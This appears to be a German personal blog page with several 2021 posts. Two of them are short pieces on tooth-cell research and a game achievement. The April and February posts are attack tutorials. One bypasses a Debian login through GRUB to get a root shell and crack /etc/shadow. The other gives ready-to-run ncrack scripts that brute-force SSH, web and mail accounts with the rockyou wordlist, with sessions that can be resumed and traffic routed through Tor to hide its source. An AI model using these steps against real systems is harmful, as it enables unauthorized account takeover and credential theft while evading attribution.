Monday, May 3, 2021

Zellulärer Bauplan der menschlichen Zähne entschlüsselt

Forscher legen Grundlagen für zellbasierte, regenerative Zahnbehandlungen.

“Die Einzelzell-Analyse könnte nicht nur für diagnostische Zwecke nützlich sein und die Früherkennung von Zahnerkrankungen unterstützen, sondern auch zur zellbasierten Regeneration von beschädigten Teilen der Zähne beitragen”, erklärt Mitsiadis. (red, 3.5.2021)

Quelle: www.derstandard.at

Saturday, April 10, 2021

Debian GNU/Linux GRUB Hack; Eine Anleitung für eine Root-Shell, falls man das Passwort nicht kennt

So kommt man ziemlich simpel in eine Standard Debian GNU/Linux Installation, falls man das Passwort nicht kennt.

Anleitung:

  1. Wählen Sie in Grub mit Hilfe der [Pfeiltasten] den gewünschten Booteintrag aus (das ist meistens jener, der automatisch vorausgewählt ist).
  2. Drücken Sie die Taste [e], um den Eintrag zu editieren. Es erscheinen wie hier im Beispiel die Bootparameter.
  3. Wählen Sie mit den [Pfeiltasten] die Kernelzeile (Beginnend mit linux) aus. Springen Sie mit der [Ende] Taste ans Zeilenende und hängen Sie dort die Parameter rw und init=/bin/bash (mit Leerzeichen getrennt) an.
  4. Drücken Sie die Taste [F10], um den Eintrag zu booten.
  5. Sie haben nun eine BASH Root-Shell und das Root-Dateisystem ist eingebunden.
  6. Sie können nun ein neues Passwort setzen z.B. mit passwd(1) oder auch die /etc/shadow kopieren und hacken z.B. mit john(8).
  7. Starten Sie das System mit reboot -f neu. Der erzwungene Reboot (Option -f; force) ist erforderlich, da ohne init-Daemon kein normaler Reboot möglich ist.

PS: Es wäre super, wenn jemand in den Kommentaren erklären kann, wie man dies verhindert und ob nur eine voll-verschlüsselte Installation sinnvoll ist?

Friday, March 26, 2021

JWE #2 Folgen Sie den Schreien!

Habe in Jurassic World Evolution die Errungenschaft Folgen Sie den Schreien! erhalten. Diese erhält man, wenn man einen T-Rex freigelassen hat.

jwe2.png

Und Stand 03/2021 haben 37,3% aller Jurassic World Evolution Spieler auf Steam, einen T-Rex freigelassen.

Sunday, March 21, 2021

FlatPress 1.2 “Legato”

Habe das Blog auf FlatPress 1.2 “Legato” aktualisiert.

Tuesday, February 23, 2021

Wörterbuchangriff: SSH-, Web- und Mail-Accounts hacken mit Ncrack und Kali Linux

Mit der Wortliste rockyou hat Kali Linux etwas nettes vorgelegt :-) Doch was anfangen mit Passwort- und Benutzernamensammlungen? Accounts hacken!
In diesem Artikel will ich nun erklären, woher die unzähligen SSH-Loginversuche stammen, die tagtäglich im Log des Server auftauchen.

Die Passwort- und Benutzernamensammlungen seclists und wordlists

Die Pakete seclists und wordlists beinhalten mehrere Listen, bestehend aus Benutzernamen und Passwörtern, die mit dem Ziel erstellt wurden, einem Sicherheitstester zu ermöglichen, diese auf einen Test anzuwenden.

Mehr darüber ist auf https://tools.kali.org/password-attacks/ zu lesen.

Installiert werden die Listen mit:

apt install seclists wordlists

Die enthaltenen Listen kann man sich mit dpkg -L seclists wordlists anzeigen lassen.

Ich will mich hier auf /usr/share/seclists/Usernames/Names/names.txt und /usr/share/wordlists/rockyou.txt.gz beschränken.

Accounts hacken

Zum Accounts hacken ist Ncrack von https://nmap.org/ meine Wahl. In der Paketverwaltung im Paket ncrack zu finden.

apt install ncrack

Ziele definieren

Die Angriffsziele übergibt man mit dem Schalter -iL, welcher eine Textdatei erwartet, die zeilenweise die Ziele in der Form <service>://target[:port-number] enthält. Z.B.:

cat <<! >targets.txt
ssh://scanme.nmap.org:22
ftps://scanme.nmap.org:990
https://scanme.nmap.org:443
imaps://scanme.nmap.org:993
smtps://scanme.nmap.org:465
!

Diese Liste hackt SSH-, Web- und Mail-Accounts! Eine Liste von weiteren Services findet man unter /etc/services. Ncrack muss aber nicht alle davon unterstützen.

Mit den Schaltern -U und -P werden die Benutzernamen und Passwörter angegeben. Wieder als Textdateien, die zeilenweise Benutzernamen bzw. Passwörter enthalten.

Die Wordliste rockyou muss also noch entpackt werden:

gunzip --keep /usr/share/wordlists/rockyou.txt.gz

Hack starten

Dieses Skript startet den Hack mit ncrack(1):

#!/usr/bin/env bash
# start ncrack scan
# Code-Listing zu den Schaltern von weiter oben
set -x -e
ncrack  
    -iL targets.txt  
    -U /usr/share/seclists/Usernames/Names/names.txt  
    -P /usr/share/wordlists/rockyou.txt  
    --save session.dat  
    -oA ncrackscan.`date +%F` --append-output
    "$@"

Der Schalter --save speichert die Session, um später, z.B. nach einem beenden des Terminal oder poweroff(8) fortzusetzen.

Hack fortsetzen

Mit dem Schalter --resume kann ein mit --save gespeicherter Hack fortgesetzt werden. Es dürfen hier keine weiteren bzw. neue Parameter angegebenen werden:

#!/usr/bin/env bash
# resume ncrack scan
set -x -e
ncrack --resume session.dat

Über tor(1) hacken

Mit dem Schalter --proxy kann man, das Netzwerk zur Anonymisierung von Verbindungsdaten, Tor als SOCKS-Proxy nutzen:

apt install tor
ncrack <options…> --proxy socks4://localhost:9050

Debuggen

Zum Debuggen des Hack kennt ncrack(1) die Schalter -v (für Verbose; der mehrfach angegeben werden kann, was die Informationsmenge erhöt) und -d1 bis -d10 (für Debug; wobei 1 bis 10 die Ausführlichkeit des Log bestimmt).

Sichere Passwörter

Zum Schluss will ich noch die Kommandos pwgen -s und apg -s erwähnen. Zwei Tools, um relativ sicher Passwörter zu erstellen, die höchswahrscheinlich nicht in Passwortlisten zu finden sind. Die Tools befinden sich in den gleichnamigen Paketen.